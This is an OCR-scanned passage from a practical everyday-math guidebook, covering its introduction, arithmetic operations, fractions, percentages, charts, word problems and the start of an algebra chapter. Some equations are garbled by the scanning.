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Introduction 


M ath is great. I’ve spent my life enjoying math and getting 
the benefits from it. But many people don’t think math is so 
hot: They have fear and loathing. 


The trouble is, a lot of what you learned in school probably was 
boring or painful, and most likely you forgot it right away. Or you 
may have deliberately not learned some types of math at all just 
to save yourself the trouble of forgetting them later. Why? Mainly 
because a lot of the math taught in schools wasn’t math you could 
use. Well, that nonsense stops here, because this book is filled 
with math you can use. Here’s just a brief sampling of the areas 
where you'll find real-life math to be useful: 


1#” At home, math comes in handy in the house, yard, workshop, 
and hobby room. It’s also a big part of cooking in the kitchen, 
whether you’re following a recipe or counting sticks of celery. 


1” The grocery store and shopping center are the places where 
most people buy the most items with the most frequency. You 
can use math when you’re shopping to make better choices 
and get better deals. 


Real-life math helps with understanding food labels, losing 
weight, and exercising. You can get healthy by chance, but 
choice is better, and math helps you make choices. 


On the job, you’ll find that a brush-up on math skills is very 
handy, whether you’re filling out a timesheet, managing time 
on a project, making change, or doing any other math-related 
tasks. 


About This Book 


Math for real life is math you need, because math for real life is 
math you use. And that’s what I focus on in this book, which is 
different from other math books. Here’s a quick rundown of the 
major differences: 


1# This book is all about practical math. Although I cover math 
fundamentals (which are the building blocks of math for real 
life), I quickly move to problems you might deal with every 
day and the specific math skills you need to handle them. 
Other math books are often filled with abstractions. 
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1#” The book doesn’t include any high-level equations, because 
you don’t need them to go shopping or to calculate your auto 
repair bill. Even the world of gambling operates on simple 
formulas. 


It takes a comprehensive look at applying math in real-life 
areas. I include a little bit about a lot of subjects, and no 
subject goes any deeper than you need it to go. Many books 
are devoted to one subject (for example, algebra, geometry, 
trigonometry, or pre-calculus). Not this one — it’s devoted to 
everything. 


1# It’s not dull (I hope), as other math books often are. Because 
it’s a For Dummies book, you can be sure that it’s easy to read 
and has touches of humor. 


But wait! There’s more! At the risk of sounding like a late-night 
infomercial, you'll find other unique features that I gar-on-tee you 
won’t find in a more traditional math book: 


You get terms, definitions, and word origins. The reason is 
that topics such as investments and insurance use so many 
odd words — and they need to be defined and explained. 


You get special insights into our culture and the way we think. 
For example, a “sale” isn’t always a sale, and “free” doesn’t 
always mean free. Even so, we tend to buy. Math for real life 
shows you where the exaggerations are. 


Conventions Used in This Book 


This book is user-friendly: easy to hold in your hands, easy to read, 
and easy to understand. On top of that, it’s easy to navigate, too, 
because the table of contents, the index, and the “In This Chapter” 
section at the beginning of each chapter help you find information 
you're looking for. 


The book uses the following conventions: 
1# Italic type highlights new terms. Once in a great while, you'll 
see italics used for emphasis. 


Although English teachers would cringe at my breaking the 
rules, I usually write numbers as numerals, not words. For 
example, the text will say “if you drive 30 miles on 2 gallons of 
gas,” not “if you drive thirty miles on two gallons of gas.” 


Variables in formulas appear as italics (for example, 3a + 4b = 10). 
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Web addresses are in monofont. They are usually very short 
and shouldn’t break across two lines of text. But if they do, no 
extra characters indicate the break. Just type what you see 
into your browser. 


What Vou’re Not to Read 


It would be great if you read all the words of this book in the order 
they appear, but life is short. You don’t have to read chapters that 
don’t interest you. This is a reference book, and it’s designed to let 
you read only the parts you need. And if you get stuck, then you 
can go over to a chapter you skipped to get some help. 


Here’s a short list of “skippable” information. Information in these 
bits isn’t essential to doing real-life math: 


You don’t have to read anything with a Technical Stuff icon 
next to it. That text gives you a little extra information about 
a technique, the origin of a principle, or maybe a formal 
definition. 


1# Sidebars (that’s what they’re called in publishing) are blocks 
of text with a gray background. They are interesting (I think), 
but aren’t critical to your understanding the main text. 


Foolish Assumptions 


The book makes some assumptions about you and what you’re 
looking for in a math book: 


You were exposed to math fundamentals in elementary 
school but may have forgotten a few of them. (Why not 
high school? Because in high school many people get bored, 
dazed, or frustrated with mathematics. So although you may 
have been in class, your mind was probably somewhere else.) 
Even if you missed some basic math concepts in school, don’t 
fret: I review most of them in this book. 


 You’re only interested in information that’s relevant to you 
and are likely to skip concepts you’re already comfortable 
with. That’s okay. This is a reference book, not a novel. 


You have access to a computer and the Internet. Although 
not essential, being able to access the Internet is very handy. 
You can use a search engine to find useful specialized 
calculators or to learn more about any topic in this book. 
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How This Book Is Organized 


This book has four parts, each representing a particular math topic. 
The chapters in the parts focus on different aspects of that topic. 
Overall, the book moves from an early review of basics to chapters 
about math that comes up in everyday life to topics related to per- 
sonal finance. Of course, you don’t have to read the chapters in the 
order they appear. Following is an overview of the kind of informa- 
tion you can find in each part. 


Part I: Boning Up on Math Basics 


In this part, you get math basics, which amount mostly to count- 
ing and simple arithmetic. Chapters 1, 2, and 3 bring out broad 
concepts related to the arithmetic fundamentals. In Chapter 4, you 
work with simple and useful statistics. Chapter 5 is about mental 
math, a great shortcut when you don’t have a calculator handy 
(which is most of the time). 


Part Il: Math for Everyday Activities 


Part II shows you how to do the calculations that spring up regularly 
in real life. Want to seed your lawn or plant a flower bed? Math 

is involved. How about preparing a dinner for six from a recipe 
designed to feed four? You need math for that, too. Ever tried to 
decide whether the higher-priced but bigger box of cereal is a 
better deal than the lower-priced but smaller box? Again, math 
comes to the rescue. Shopping, cooking, driving around town, 
dining out, or trying to lose weight — math makes all these tasks 
easier. 


Part Ill: Math to Manage 
Vour Personal Finances 


True, you may deal with personal finances daily, but they represent 
a sort of “special” kind of math. To handle these tasks well, you 
need to understand some general principles, a few specialized 
terms, and a few strategies. Fortunately, this part has you covered. 
Here you can get info to create a budget, better manage your bank 
account and check register, avoid credit card debt, invest more 
wisely, and more. 
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Part IV: The Part of Tens 


What better way to end a book chock-full of easy-to-apply math 
formulas and principles than a couple of lists highlighting 
calculations you can do in your head and games you can play to 
build your math skills and sharpen your critical thinking? Consider 
this the icing-on-top-of-the-cake part. 


Icons Used in This Book 


In the margins of this book you'll see small drawings called icons. 
Each icon calls out a special kind of information. 


y A tip is a suggestion or a recommendation. It usually points out a 
quick and easy way to get things done or provides a handy piece of 
extra information. 

ghiNGy 

Ry A warning alerts you to conditions that, if you’re not careful, could 
lead you to wrong answers, faulty conclusions, or otherwise mess 
up your day. 

BE, 
ow R 


by 


This icon appears beside information that’s important enough to 
keep in mind, both for the task at hand and in general. 


yA S Tle, 


S 
Š oo, I use this icon to share esoteric or otherwise interesting but 
-EAZ ) non-essential information. 


Where to Go from Here 


You can go to any chapter of the book from here. Although I’ve 
written this book so that the basic info comes first, you can start 
anywhere you want. Need a little more guidance? Here are some 
suggestions: 


If you’re browsing for a topic that piques your interest, check 
out the table of contents. Here you can see all the topics this 
book covers. Chances are one (or more) will call to you 
immediately. You can also try the “thumb test”: Riffle through 
the pages until something catches your eye. 


If you haven’t made a choice, begin with Chapter 1. It has 
broad concepts and is a good launching pad into the 
discussions elsewhere in the book. 
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If you have a particular problem (for example, maybe with 
shopping or investments), head to the table of contents or the 
index to find what you’re looking for. 


If you get stuck at any time, you’ll probably find another chapter 
that can help you out. Just stop what you’re reading and go visit 
that chapter. 


Partl 
Boning Up on 
Math Basics 


The 5th Wave By Rich Tennant 


ena od ——— ae 


Pm mathematically dyslexic. 
But it’s not that unusual - 
100 out of every 15 people are. 


In this part... 


n this part, you'll find a review of math basics, 
including simple math concepts from your school 
days, like numbers, counting, and arithmetic operations. 


You also discover math principles like ratio-proportion, 
conversions, and statistics and probability. I also share 
the best all-purpose calculation method. Chapter 5, which 
is all about doing simple math in your head, is a math 
bonus. Mental math is a handy tool, and the techniques 
aren’t hard to learn. 
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Awesome Operations: 
Math Fundamentals 


In This Chapter 
Reviewing the four arithmetic operations 
Manipulating fractions 
Using charts to convey and understand information 


Strategies to help you solve word problems 


M ath has basic operations that you need to know. These 
operations — addition, subtraction, multiplication, and 
division — make all the other math in this book possible. 


The good news is that you most likely learned about basics (like 
counting) even before you entered school, and you learned about 
basic arithmetic operations in elementary school. So you’ve been 
at it for a long time. 


In this chapter, I review counting and the fundamentals of the four 
basic arithmetic operations. Other important topics I cover here 
are fractions, percentages, charts and graphs, and word problems. 
But don’t worry: None of these are mysterious. 


Numbers Vou Can Count On 


The most fundamental component of math is numbers. The first 
thing you do with numbers is count, and you probably started 
counting when you were very young. As soon as you could talk, 
your mother cajoled you to tell Aunt Lucy how old you were or to 
count from 1 to 5. 


Counting was the first and most useful thing you did with math, and 
you still use it every day, whether you’re buying oranges at the gro- 
cery store or checking the number of quarts of motor oil in a case. 
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fact, the Ishango bone is a tally stick (a counting stick), and it’s 
over 20,000 years old! 


Several kinds of numbers exist. Over time, mathematicians have 
given them many names. The two most important kinds are whole 
numbers and fractions. To see a little bit about how these numbers 
work, use a number line, a simple display of numbers on a line (see 
Figure 1-1). 


{—}—}—} +4} ++ ++} +--+ + 
9-8-7-6-5-4-3-2-10123 456789 


Illustration by Wiley, Composition Services Graphics 


Figure 1-1: A number line. 


The numbers to the right of 0 are called natural numbers or counting 
numbers. Of course, they are the numbers you use to count. 
They’re easy for anyone to work with because they represent 

how many of something someone has (for example, 6 apples or 3 
oranges). 


Over many centuries and in different cultures, people made up the 
number 0, which represents the lack of a quantity. The numbers 
to the left of 0 on the number line, negative numbers, are a harder 
concept to grasp. You recognize negative number in real life. For 
example, if your checking account is overdrawn, you have a 
negative balance. If someone owes you $3.00, you have “negative 
cash” in your pocket. 


Here are the key points to know about the number line: 


All the numbers you see in Figure 1-1 are whole numbers, also 
called integers. An integer is a number with no fraction part. 
The word comes from Latin, and it means “untouched,” so it’s 
the whole deal. 


The numbers to the right of zero are positive integers. The 
numbers to the left of zero are negative integers. 


Mathematicians (and I’m not making this up) have trouble 
with zero. The best they can do is attach it to the positive 
integers and label the group non-negative integers. 


The number line stretches to the left and right, to infinity and 
beyond (as Buzz Lightyear says). 


Decimals (such as 0.75) and regular fractions (such as 3/5) 
are only a part of a whole number. They all have a place 
somewhere on the number line. They fit in between the 
integers. For example 2.75 “fits” between 2 and 3 on the 
number line, because it’s greater than 2 but less than 3. 
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Reviewing the Four Basic 
Operations 


To do any sort of math, you need to know your math basics. The 
four basic operations — addition, subtraction, multiplication, and 
division — let you take care of all kinds of real life math. But what’s 
also very important is that those same basic math operations allow 
you to handle fractions and percentages, which come up all the 
time in ordinary math tasks. Later (in Chapter 2), these operations 
form the basis for managing algebra equations and geometry. 


The core operations are addition and subtraction. You very likely 
know what they are and how they work. Multiplication and division 
are “one step up” from addition and subtraction. The following 
sections give you a quick review of these four operations. 


Addition 


Addition is a math operation in which you combine two or more 
quantities to get (usually) a larger quantity. Addition was probably 
the first math you ever did. 


You can add numbers (called the operands) in any order. This 
property (that is, the ability to perform the operation in any order) 
is called commutativity. 


214314+414+51=144 
is equal to 
514+ 41+31+21=144 


No matter in what order you add the operands, the sum still 
equals 144. 


Subtraction 


Subtraction is a math operation in which you take away the value 
of one number from another, resulting in (usually) a smaller 
quantity. 


In subtraction, the order of the operands is important. You can’t 
rearrange the numbers and get the same answer. For example, 
77 — 22 (which equals 55) is not the same as 22 — 77 (which 
equals -55). 
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MBER 


Multiplication 


Think of multiplication as repeated addition. For example, you 
likely know that 3 x 4 = 12, but you can also get there by adding 3 
four times: 


3+3+3+3-=12 


The technique also works for large numbers. For example, 123 x 7 
= 738 is equivalent to this: 


123 + 123 + 123 + 123 + 123 + 123 = 738 
But who wants to do all that adding? 
Here’s the best advice for multiplication: 


For little numbers, know your multiplication table. It’s easy, 
up to 10 x 10. 


For big numbers, use a calculator. 
As with addition, you can multiply the numbers in a list in any 


order. The expression 3 x 4 is the same as the expression 4 x 3. 
Both equal 12. 


Division 
Division is essentially “multiple subtraction.” In a simple problem 


such as 12 = 4 = 3, you can get the result by subtracting 3 four 
times from the number 12. 


12+3=4 with no remainder 
is equal to 12—3-—3-—3-3=0 (4 subtractions with no remainder) 


In division, the order of the operands is important. You can’t 
rearrange them and end up with the same answer. 


Finagling Fractions 


Fractions take several forms, but in real life, the forms you deal 
with are common fractions and decimal fractions. 


A common fraction has two parts. The numerator is the top number, 
and the denominator is the bottom number. You don’t have to 
learn these words, however. Just think “top number” and “bottom 
number.” 
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numerator 
denominator 


What do you do with fractions? Arithmetic operations and 
conversions, that’s what. 


A common fraction is sometimes called a simple fraction or a vulgar 
fraction. The vulgar fraction isn’t really rude; vulgar is just another 
word for common (from the Latin vulgus, meaning “common 


people”). 


Getting familiar with 
types of fractions 


Like the popular ice cream parlor, fractions come in several flavors. 
Not 31 flavors, however. For this book, you have to remember only 
a few fraction types: 


Proper fraction: In a proper fraction, the numerator is smaller 
than the denominator (for example, 4). 


Improper fraction: In an improper fraction, the numerator is 
larger than the denominator (for example, 9). Think “Honey, 
does this numerator make my fraction look big?” 


¥ Mixed fraction: A mixed fraction is a combination of a whole 
number and a fraction. Here’s an example of a mixed fraction: 
3 
17 


Decimal fraction: A decimal fraction uses a decimal point (for 
example, 0.23, 1.75, or $47.25). 


Decimals are fractions, too, even though they don’t look like the 
other types of fractions. Look at this: 0.75 is a decimal. But what 
does that really mean? It means 75/100. 


Reducing fractions 


Here’s fair warning: Doing fraction math often produces “clumsy” 
fractions. By clumsy, I mean unwieldy proper fractions (48/60, for 
example) and bad-looking improper fractions (37/16, for example). 
They are handy during the calculations but are very inconvenient 
as final answers. 


You turn a clumsy fraction into something lovely to behold by 
reducing it. 
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Reducing proper fractions 


You reduce proper fractions by finding a number that the numerator 
and denominator share and then separating it out. This tactic is 
called factoring, and multiplication rules allow you to do it. For 


example, for the fraction g you “break out” the common factor 12 


in both the numerator and denominator: 


48 _ 4x12 
60 5x12 
48 4,12 
60 5°12 
48 _ 4 

60 5X! 

48 _ 4 

60 5 


gore 
S When a fraction has the same numerator and denominator, it’s 


equal to 1. Hence, 5 becomes 1. 

Another way of describing this is to say, “You reduce a proper 
fraction by dividing the top and bottom numbers by the same 
number.” 


Reducing improper fractions 

To reduce an improper fraction, you break it into whole numbers 
and a remaining, smaller fraction. To do this, you divide the 

top number by the bottom number, and then you use the whole 
number and the remaining fraction to form a mixed fraction. Here’s 
an example: 


49 __16+16+16+1 
a 16 


16 
Rio 
Paiste ye 

16 “376 


Adding, subtracting, multiplying, 
and dividing fractions 


Fractions are just numbers. Like integers, you can add, subtract, 
multiply, and divide them. Before you panic, keep in mind that you 
perform these math calculations on fractions all the time. Don’t 
believe me? Think about money. 
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At first, dollars and cents don’t look like fractions because they’re 
in decimal form. But they are fractions, for sure. To look at the 
details, take a gander at the following sections. 


Addition 


To add two fractions, the fractions must have the same denominator 
(also called a common denominator). After the denominators are 
the same, you add fractions simply by adding the numerators. 


When the denominators aren’t the same, you need to make them 
the same. You can’t directly add 1/2 pie to 1/4 pie to get 3/4 pie, for 
example. You need to convert the 1/2 pie into quarters (2/4 pie). 
Figure 1-2 shows what adding pieces of pie looks like. 


3 
O 


Illustration by Wiley, 
Composition Services Graphics 


Figure 1-2: Adding Fractions. 


Getting the denominators the same is easy because you're allowed 
to multiply both the top number and the bottom number by the 
same number. In the pie example, you multiply both numerator 
and denominator of the fraction 1/2 by 2: 


1,2 
er eg 

_ 1x2 
X=72x2 
x=4 


After you have all operands in 1/4 pie units, adding 2/4 and 1/4 to 
get 3/4 is easy. (Remember that the denominator stays the same 
when you add the numerators.) 
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Subtraction 


To subtract two fractions, the fractions must have a common 
denominator (just as they must in addition); then you simply 
perform the operation on the numerators. 


If the denominators aren’t the same, you need to make them the 
same before you can subtract. For example, you can’t directly 
subtract 1/4 pie from 1 whole pie (which in fraction form is 1/1) 
to get 3/4 pie because the denominators are different. Again, you 
need to convert the whole pie into quarters, and you do that by 
multiplying the numerator and denominator by 4 to get 4/4 pie. 
Then you can do the subtraction: 


After all the operands are in 1/4 pie units, subtracting 1/4 from 4/4 
to get 3/4 is easy. (Remember that the denominator stays the same 
when you subtract the numerators.) 


-4_1 
*=474 
J 

Multiplication 


Compared to adding and subtracting fractions, multiplying fractions 
is easy. Just multiply the numerators, multiply the denominators, 
and then reduce. 


x=35 


The answer is 18/35. When possible, try to reduce the result. In 
this case, you can’t reduce 18/35 at all. 


Division 

Here’s the secret to dividing fractions: Invert and multiply. That is, 
flip the second fraction so that the numerator is on the bottom and 
the denominator is on the top, and then multiply as you would any 
other fraction. 


a\? 
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Say you want to divide 1/4 by 2. (Vote: The fraction form of a 
whole number is that number over 1.) The answer is obviously 1/8. 
Not so obvious, you say? Here’s how you get the answer: 


x=}+2 

sie} 

x=}x4 

4 
You follow the same process when you want to divide a fraction by 
a fraction: 

=t 

x=1x3 

= 


Notice that dividing by a fraction yields a higher result than 
dividing by a whole number. 


You can’t divide by 0. It’s mathematically impossible. The old 
saying is, “Never divide by zero! It’s a waste of time, and it annoys 
the zero.” 


Converting fractions 


The handiest fraction conversions are turning common fractions 
into decimal fractions and turning decimal fractions into common 
fractions. 


A fraction is a ratio, too 


In math, a ratio is a relationship between two numbers. | mention this because 
ratios come up all the time. 


The size of a wide-screen DVD image Is called the aspect ratio, usually 16:9. That 
amounts to 16 inches of width for every 9 inches of height, and it doesn’t really 
matter how big your TV screen is. The ratio is always the same. 


If you have a gas-powered weed eater (also known as a string trimmer or weed 
whacken), you've probably bought 40:1 2-cycle engine oil for it. The 40:1 ratio means 
that you mix 40 parts gas to 1 part oil. 
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Turning a common fraction into a decimal fraction 


To turn a common fraction into a decimal fraction, just divide the 
denominator into the numerator. A number like 4/5 easily turns 
into 0.80 when you divide 4 by 5. 


Don’t be surprised or alarmed if some division doesn’t come out 
“even.” For example, the decimal equivalent of 1/3 is 0.333333333 
(and the 3s go on forever). If you see a sale item marked “33% off,” 
it’s been reduced by 33 percent or about 1/3. If the item is marked 
“20% off,” it’s been reduced by 20/100, or 1/5. (See the section 
“Processing Percentages” for the lowdown on how to work with 
percentages.) 


Turning a decimal fraction into a common fraction 


To turn a decimal fraction into a common fraction, just express the 
decimal as a fraction and reduce the fraction. 


A decimal with one decimal place (0.6, for example) needs a fraction 
with 10 in the denominator. A decimal with two decimal places 
(0.25, for example) needs a fraction with 100 in the denominator, 
and so forth. Here are some examples: 


-6 

0.6= 75 
at 
0.71= 759 
_ 303 
0.303 = -000 


Notice that the number of zeroes in the denominator is the same 
as the number of decimal places in the decimal fraction. 


For example, say you want to convert 0.375 into a fraction. Here’s 
how you’d go about it: 


x= 3x12 
x=3x1 
-$ 


In this example, when you “factor out” 125 from both the numerator 
and denominator, the result is the common fraction 3/8. See the 
section “Reducing proper fractions” for details on factoring. 
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Processing Percentages 


R= STUp, 


gore 


A percentage is a fraction whose denominator never changes. 
It’s always 100. A number like 33 percent, for example, refers to 
33 parts in 100, or 33/100, or 0.33. You see percentages written 
as “33%” and “33 percent.” No matter how it’s written, it’s just 
another way of saying “thirty-three parts in one hundred.” 


Percent and per cent means “per centum,” which is from the Latin 
phrase meaning “by the hundred.” So a percentage always refers to 
a number of parts out of 100. 


Percentages are especially handy for comparing two quantities. 
For example, if one beer contains 5.5 percent alcohol and another 
contains 12 percent alcohol, you can be sure that the “high octane” 
beer has a lot more punch. 


Percentages also let you compare values to an arbitrary standard. 
Nutrition labels are a good example They compare items in food, 
such as dietary fiber, cholesterol, or vitamins and minerals, to the 
Dietary Reference Intake (DRI) nutrition recommendations used by 
the United States and Canada. 


A percentage is a dimensionless proportionality, meaning that it 
doesn’t have a physical unit. Fifty percent of a length is still 
50 percent, whether you’re talking about feet or light years. 


Converting a common fraction 
to a percentage 


Sometimes you want to convert a fraction to a percentage. Say, for 
example, that you’re fed up with your commute to work, because 
the drive requires 1 hour each way. You’re at the job for 9 hours, 
so work consumes 11 hours of your day, 2 of those hours with 
you sitting in traffic. While stuck in bumper-to-bumper traffic, you 
wonder what percentage of your work-related time in spent com- 
muting. The fraction is 2/11, so what’s the percentage? 


To convert a common fraction into a percentage, just divide the 
numerator by the denominator and multiply the result by 100: 
percentage = 4 x 100 
percentage = 0.1818 x 100 
percentage = 18.18 


You can see that 2/11 is about 18 percent. What could be simpler 
than that? 
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A percentage is a ratio, too 


As | mention earlier, a ratio is a relationship between two numbers. A percentage 
can often be expressed as a ratio. For example, if a bottle of vodka contains 40 
percent alcohol (which, confusingly, is called 80 proof in the United States), that 
means that 40 parts in 100 are alcohol. That's a ratio of 40:60, 40 parts of alcohol to 
60 parts of water. 


You can convert from a ratio to a percentage, too. For example, a “four to one” 
martini has a gin:vermouth ratio of 4:1. The vermouth is 1/5 of the cocktail, or 
20 percent. 


Converting a percentage 
to a fraction 


Sometimes a fraction may be more convenient than a percentage. 
Perhaps you want to know what fraction of your salary goes to 
taxes. Or maybe you're less inclined to eat a whole 8-ounce bag of 
chips when you think in terms of it having 1/2 rather than 50 percent 
of your daily recommended amount of sodium. 


To convert a percentage into a common fraction, just divide the 
percentage by 100 and reduce the result. For example, say to want 
to convert 80 percent into a common fraction: 


80 percent =??? 


_ 80. 
80 percent = 100 

_ 4x20 
80 percent = 5x20 
80 percent = tx ae 
80 percent = 4 


The value 80 percent means 80/100. Form a fraction and reduce it. 
As you can see, 80 percent is 4/5. 


Grasping Charts and Graphs 


A chart or graph is a visual representation of numbers. Charts and 
graphs come in many forms, but for day-to-day math, you need to 
know about only three kinds — the line chart (or graph), the pie 
chart, and the bar chart. 
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The key point is that a chart is visual, and people usually find a 
visual display to be more understandable than a list of numbers. 
Expect to encounter charts when you read about the economy 

or when you compare consumer products. Also, the best thing is 
that you can make your own charts, which you may want to do, for 
example, to get a better picture about your personal finances. 


Looking at line charts 


A line chart (sometimes called a line graph) displays information 
as data points connected by a line. With this chart, you can easily 
see how an item is trending. Figure 1-3 shows typical temperatures 
over a week. What can you glean from this data? That the weekend 
was hot! 
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Figure 1-3: A line chart. 


A line chart can easily show you how the economy is doing. Think 
unemployment figures. Also, you can make a chart that shows how 
one (or all) of your investments is doing. 


Gobbling up pie charts 


A pie chart looks like, er, a pie, which is divided into “slices” that 
show the relative proportion of various elements. This type of 
chart lets you see both the relationship between elements and the 
relationship of individual elements to the whole pie. 


Pie charts are great when you have to compare only a few elements. 
When you must compare many elements, the slices get too thin 
and they’re harder to understand. 


Figure 1-4 shows a typical monthly budget. After paying the 
rent, making the car payment, and buying food, you can see that 
not much is left for everything else. Note that it doesn’t matter 
whether you make $1,000 a month or $10,000 a month. The pie 
chart shows relative proportions. 
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Legend: 
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Figure 1-4: A pie chart. 


ay? A pie chart is great for making comparisons of government 
expenses relative to each other. And seeing where your tax money 
goes is always fun. Visit the Center on Budget and Policy Priories: 
http: //www.cbpp.org/cms/index.cfm?fa=view&id=1258. 


Bellying up to bar charts 


A bar chart has rectangular bars that can be either horizontal or 
vertical. The size of the bars represents bigger or smaller values. 


Bar charts are great for showing anything over time, including 
variable income, variable expenses, and even the number of 
burgers sold at the local drive-in. Figure 1-5 is a bar chart that 
shows what my Visa bill was for seven months. Can you tell when I 
went on vacation? 
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Figure 1-5: A bar chart. 


Working Wicked Word Problems 


Do you remember word problems (sometimes called “story 
problems”) from school? A few people loved them, but many 
people hated them. 
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What’s peculiar is that most of life’s math problems start as word 
problems, a fact that’s understandable because we speak in words, 
not numbers. So if you say, “The boss gave me a 10 percent raise,” 
figuring out your new salary starts as a word problem. 


At first glance, some word problems appear to be baffling. But 
that’s just at first glance. You simply need to know a few tricks that 
can make all word problems easy to solve. The basic process for 
solving word problems is to first do some analysis and then do the 
math. 


Doing the analysis 


Two parts are involved in solving a story problem. The first part 
is to study the problem a little. That makes the second part (doing 
the math) easy. 


For example, a shed has a roof that’s 6 feet by 10 feet on each side. 
The barn’s roof is twice as long and twice as deep as the shed’s 
roof. Both buildings are red. If it takes 120 shingles to cover the 
shed’s roof, how many shingles does it take to cover the barn’s 
roof? 


When you analyze a story problem, you go through the problem to 
get the info you need to eventually solve it. Follow these steps: 


1. Read the problem and list the facts. 


Always read word problems more than once. Facts are 
hiding in the question. From the question, you know the 
dimensions of the shed roof on each side. You get a sense 
of the dimensions of the barn’s roof, and you know how 
many shingles are needed to cover the shed. Good! 


2. Figure out exactly what the problem is asking for. 


In every word problem, you run the risk of solving — 
correctly — for the wrong thing. So make sure you know 
what the question asks for. In the example, you know that 
the answer is “number of shingles to cover the barn.” The 
question could have been about calculating the number of 
shingles to cover both the shed and the barn, but it’s not. 


3. Eliminate excess information. 


Both real life and school story problems tend to have 
extraneous facts. Ignore them. For example, the fact that 
both buildings are red is interesting but not important. 
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4. See what information is missing. 


Sometimes a major fact is missing. What’s more likely, 
however, is that the information is hiding. For example, the 
info that the barn’s roof is twice as long and twice as deep 
as the shed’s gives you a clue about calculating the area of 
the barn’s roof. 


5. Find the keywords. 


Be on the lookout for key words and phrases, such as “how 
much more,” “how much less,” and “total.” Those words 
and phrases usually indicate what kind of math operations 
are involved. 


Applying the math 


Almost every story problem uses a simple algebra formula that’s 
“hiding” in it. When you develop the formula, you then insert the 
numbers to solve the problem. Math instructors often call this last 
step “plug and chug.” 


To apply the math, take the info you gleaned from your analysis 
and do the following: 


1. Convert information supplied into information needed. 


First, use the given dimensions of the shed roof to calculate 
how many square feet are covered by 120 shingles. 

area (shed) = length x depth x 2 

area (shed) =6x10x2 

area (shed) = 120 


The answer is 120 square feet. (Vote: You multiply by 2 to 
take into account both sides of the shed’s roof.) 


Then use the given dimensions of the shed roof to calculate 
the area of the barn’s roof. The barn’s roof is twice as long 
and twice as deep as the shed’s roof. 

area (barn) = 2( shed length ) x 2(shed depth) x 2 

area (barn) = 2(6)x2(10)x2 

area (barn) = 12 x 20 x2 

area (barn) = 480 

The answer is 480 square feet. 


2. Apply a formula. 
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There’s a technique called ratio-proportion. Don’t worry 
about the details now (I explain it fully in Chapter 3). Here, 


you apply the technique: 
known quantity (shed area) known quantity (barn area) 
known quantity (shed shingles) desired quantity (barn shingles) 
120 _ 480 
120 x 
120x = 57,600 
x = 480 


You cross multiply and solve. The answer is 480 shingles. 


Pay attention to units and phrase the answer in the units 
asked for. In the example, you must express the answer in 
shingles, not square feet. 


3. Check for reasonableness. 


Always make sure the answer is reasonable. Because 

the barn is bigger than the shed, the barn should take 
more shingles than the shed. The 120 versus 480 is one 
reasonableness check. In the example, if you get an answer 
of 48 shingles or 48,000 shingles, something is wrong. 


If you crave a shortcut, consider this: The fact that the barn’s roof 
is twice as long and twice as deep as the shed’s roof means that 
the barn’s roof has four times the area. With that info at hand, the 
calculation is easy: Simply multiply the shed’s 120 shingles by 4, 
giving you 480 shingles. 


Other story problem tricks 


If you find yourself totally stuck on a word problem, a few tricks 
may help you out: 


Draw a diagram. Sometimes, drawing a picture using the facts 
in the problem can be a help. This tactic works when you 
need to find the area of a garden, the board feet you need for 
a deck, or how old your brothers and sisters will be when you 
reach a certain age. 


Find a formula. When you encounter a problem about interest 
on your savings account or the amount of mortgage payments, 
chances are excellent that someone has already developed a 
formula to solve it. Chances are also very good that you can 
find an online calculator or an embedded function in a 
spreadsheet application to help you out. 
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Develop a formula. Sometimes you can make your own 
simple formula instantly. For example, as soon as you know 
that a hamburger has 21 grams of protein and that dietary 
guidelines recommend 56 grams of protein a day, a little quick 
math (divide 56 by 21) shows that about three burgers at that 
backyard barbecue will give you a full day’s worth of protein. 
And a formula works all the time, after you develop it. 


Consult a reference. Using a reference isn’t just desirable; 
it’s also sometimes necessary. For example, if you’re painting 
a room, calculating the area to be covered isn’t hard (see 
Chapter 8), but it’s essential to consult the paint manufacturer’s 
information to learn how much area a gallon of paint will 
cover. 


Chapter 2 


High School Reunion: 
Revisiting Key Principles of 
Algebra and Geometry 


In This Chapter 
Understanding variables, constants, expressions, and equations 
Performing operations on algebraic equations 
Getting (re)acquainted with basic geometric shapes 
Using common formulas to determine area, perimeter, and volume 


D: you and math part ways? If so, you likely stopped dating 
each other and broke up in high school, which is when most 
students meet up with algebra and geometry for the first time. You 
may have avoided these math classes, or maybe you took them but 
didn’t pay as much attention as you should have. 


As it turns out, algebra and geometry have some super concepts, 
and those concepts have enormous practical value, as you see in 
the rest of this book. 


In this chapter, I take you back to high school for a reunion of 
sorts: I reintroduce you to some of the basic concepts and 
vocabulary of these two handy branches of mathematics. With 
those in hand, you'll be able to solve most algebra or geometry 
problems that come up in real life. 


“A” Stands for “Algebra” 
and “Awesome” 


Algebra is a branch of math that deals with variables and constants, 
and their relationship to each other in equations. When you solve 
a real-life math problem, chances are you’re using algebra. 
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In this section, you get friendly with the names of the parts of an 
algebra statement. Then you go on to do simple (but essential) 
math operations. As you read through the next sections, keep 
these key points in mind; they may allay any trepidation you have 
about algebra: 


In algebra, letters represent numbers — that’s it. And they 
represent numbers only until you solve the problem and 
replace them with numbers. 


The operations used in algebra problems aren’t mysterious. 
You work on algebraic variables and constants, using the 
same math operations you use on numbers in “plain” arithmetic. 


Getting acquainted with variables 
and constants 


This sounds amazingly obvious, so get ready: Variables vary in 
value (until you determine what they are), and constants are 
constant in value. 


Oh, you're so variable 


A variable in algebra is a number whose value you don’t yet know, 
so it’s represented by a letter. The value of the variable may be 
anything, and that’s why it’s called a variable. The following are 
typical variables: 


a b c x 


In an algebraic statement, you often see more than one variable 
and maybe a number or two. Here’s an example: 


a+2=b 


You read and say the statement in almost the same way you'd say, 
“1 plus 2 equals 3.” Instead you just say “a plus 2 equals b.” 


The letters a and b represent unknown numbers, but when you 
know what a is and add 2 to it, you can figure out what b is. 
For example, if you learn that the variable a is equal to 5, then the 
example becomes this: 

5+2=b 


So the variable b is equal to 7. 
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Variables can be any letter you want, but x is a very popular 

variable name. You’ve probably heard teachers, students, and 
co-workers talk about “solving for x.” Using x as a variable has 
a mysterious flavor, suggesting a great unknown. Think of The 
X-Files, “X marks the spot,” and Planet X (the Star Trek novel). 


Are your constants constant, Constance? 


The opposite of a variable is a constant. It has a fixed value. For 
example, look at 


a+2=b 


Note that 2 is a constant. If variable a changes, it causes variable b 
to change, but the constant 2 stays the same. 


Various types of numbers, such 3, 2.5, 1/2, and x (pi) are constants. 
Constants can be numbers of any kind. 


Expressions and equations 


After you understand the difference between variables and constants, 
you can begin to form variables and constants into expressions 
and equations. 


Examining expressions 


When life gives you lemons, make lemonade. When math gives you 
variables and constants, make expressions. An expression is a 
